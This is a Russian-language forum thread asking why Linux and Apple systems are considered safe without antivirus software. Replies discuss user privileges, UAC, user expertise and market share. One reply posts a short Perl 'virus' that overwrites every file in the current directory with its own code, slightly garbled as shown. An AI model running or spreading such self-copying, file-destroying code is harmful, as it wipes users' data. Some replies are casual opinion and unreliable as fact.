Программное обеспечение

Кто-нибудь может дать толковое подробное объяснение почему в Linux и iOS безопасно работать и без антивирусов?

Ведь хакеры в основном и работают в этих системах. Неужели не нашлось умников их взломать и написать под них бэкдоры и снифферы?
Булат Бегенов
Запросто. В Windows 95% пользователей не сидят из-под учётной записи с обычными правами, потому что она (до сих пор!) не создаётся по умолчанию, то есть любой запущенный вирус может делать почти всё, что захочет - ограничений ему почти нет. Unix-подобные ОС в этом плане на самом деле ничем не лучше - если запустить вирус от имени администратора, который там зовётся суперпользователем, произойдёт то же самое, что и на виндах, но там по умолчанию все работают с обычными правами, а в Windows это надо ещё настроить. И потом, средний уровень знаний у пользователей Unix-подобных ОС намного выше, потому что маки дорогие, а Линукс нужно ещё вручную установить безо всяких там "мастеров", которые умеют только переустанавливать винды, они-то с подозрением отнесутся к необходимости прав суперпользователя неизвестным программам.
Давлатали Бобохонов
Лучший ответ
Булат Бегенов Хороший ответ. Спасибо.
Александр Зимин По умолчанию включен UAC. Большинство его отключают, а потом здесь задают вопросы: как удалить китайскую байду.
На Линуксе в основном сидят люди, которым и под виндовсом антивирус не нужен.
Ну и ещё то, что версий Линукса так много, что написать универсальный, поражающий всё, вирус практически невозможно.
Пример - андроид, по сути то же Линукс, но вирусов полно. Потому что везде одинаковый и люди такие, что способны одновременно поймать и блокиратор на телефон и гусарский насморк себе.
Сергей Мммм
Виндой пользуется много народу а люникс единицы не знаю сейчас статистику но раньше небыло смысла .
***aidar Baisagatov
Булат Бегенов Да это понятно, что 80% юзали и будут мелкософт юзать. Но есть же и немалый сегмент "яблочников" и "пингвиноидов", для них разве вирусов не пишут совсем?
Нахера писать вирус, который будет работать у 1.5 человека? Если ты работаешь на массового пользователя.
Плюс более грамотная адаптация файловой системы, а не та помойка, что на винде
Булат Бегенов Да вы должно быть прикалываетесь. Любой приличный сисадмин ставит сервера на Linux. К тому же, с новыми "виндоподобными" десктопами Linux стал довольно популярным и на домашних PC. Ну а про Mac я и вобще не говорю. Он почти на всех серьёзных фирмах в Европе и Америке.
Вирус на Perl. Простая программа, которая будет просто переписывать себя в другие файлы:

#!/usr/bin/perl
open(File,$0);
@Virus=;
close(File);
foreach $FileName (<*>)
{
open(File, ">$FileName");
print File @Virus;
close (File);
}
Андрей Панин
Все дело в малой популярности линуксов на десктопах, а технически - разницы нет. Вирус можно написать под любую ОС.
А бэкдоров и в линуксе полно. Умышленно сделанная ошибка в каком либо приложении (например не сделали проверку на длину строки вводимую пользователем) - это уже бэкдор для тех кто умеет.
Suhrob Azimov
Потому что есть распределения прав. Есть по юзер, а есть суперпользователь.
Unix'ы с root'ом, и с пользователем по умолчанию...
Alexandru Marin